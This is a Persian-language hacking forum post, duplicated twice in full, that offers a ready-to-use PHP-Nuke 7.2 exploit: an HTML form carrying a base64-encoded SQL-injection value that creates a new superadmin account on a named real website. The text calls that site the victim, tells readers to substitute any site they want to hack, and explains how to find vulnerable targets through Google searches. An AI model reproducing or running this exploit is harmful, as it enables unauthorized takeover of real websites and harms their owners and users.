hamid_131
Active Member
يكي ار باك هاي نه چندان جديد ولي مفيد در php nuke باكي هستش كه با اون اون شما مي تونيد يك ادمين جديد براي سايت تعريف كنيد
كد زير رو با نام ex.htm
----------------------------------------------------
كد:
<html>
<head>
<title> ...:: PHP-Nuke Exploit ::... </title>
</head>
<! Exploit 1>
<basefont size=2 color=yellow face=tahoma>
<form name="mantra" method="POST" action="http://www.conradtaxservice.com/admin.php">
USERNAME: <input type="text" name="add_aid" value="">
NAME: <input type="text" name="add_name" value="name">
PASSWORD: <input type="text" name="add_pwd" value="123456">
E-MAIL: <input type="text" name="add_email">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor"></p>
<input type="submit" name="Submit" value="Create Admin"> <input type="reset" name="Submit2" value="Reset">
</form>
</body>
</html>
در اينجا سايت قرباني www.conradtaxservice.com بوده و شما بايد نام سايتي رو كه مي خواهيد هك كنيد با اين اسم عوض كنيد
بعد از save كردن و باز كردن صفحه ي html با مرورگر اينترنت .بايستي ادرس ايميل و ديگر مشخصات را براي ساخت مدير را نيز وارد كنيد
بعد از زدن دكمه ي make admin براي كنترل صحت اجرا شدن موفقيت اميز exploit مي توانيد با این نام کاربریدر صفحه ی مدیریت www.conradtaxservice.com/admin.php لاگین کنید
این باگ در phpnuke 7.2 کار می کند
برای جستجوی سایت هایی که phpnuke روی ان ها نصب است در googleکلمه ی powerd by phpnuke را جستجو کنید
كد زير رو با نام ex.htm
----------------------------------------------------
كد:
<html>
<head>
<title> ...:: PHP-Nuke Exploit ::... </title>
</head>
<! Exploit 1>
<basefont size=2 color=yellow face=tahoma>
<form name="mantra" method="POST" action="http://www.conradtaxservice.com/admin.php">
USERNAME: <input type="text" name="add_aid" value="">
NAME: <input type="text" name="add_name" value="name">
PASSWORD: <input type="text" name="add_pwd" value="123456">
E-MAIL: <input type="text" name="add_email">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor"></p>
<input type="submit" name="Submit" value="Create Admin"> <input type="reset" name="Submit2" value="Reset">
</form>
</body>
</html>
در اينجا سايت قرباني www.conradtaxservice.com بوده و شما بايد نام سايتي رو كه مي خواهيد هك كنيد با اين اسم عوض كنيد
بعد از save كردن و باز كردن صفحه ي html با مرورگر اينترنت .بايستي ادرس ايميل و ديگر مشخصات را براي ساخت مدير را نيز وارد كنيد
بعد از زدن دكمه ي make admin براي كنترل صحت اجرا شدن موفقيت اميز exploit مي توانيد با این نام کاربریدر صفحه ی مدیریت www.conradtaxservice.com/admin.php لاگین کنید
این باگ در phpnuke 7.2 کار می کند
برای جستجوی سایت هایی که phpnuke روی ان ها نصب است در googleکلمه ی powerd by phpnuke را جستجو کنید
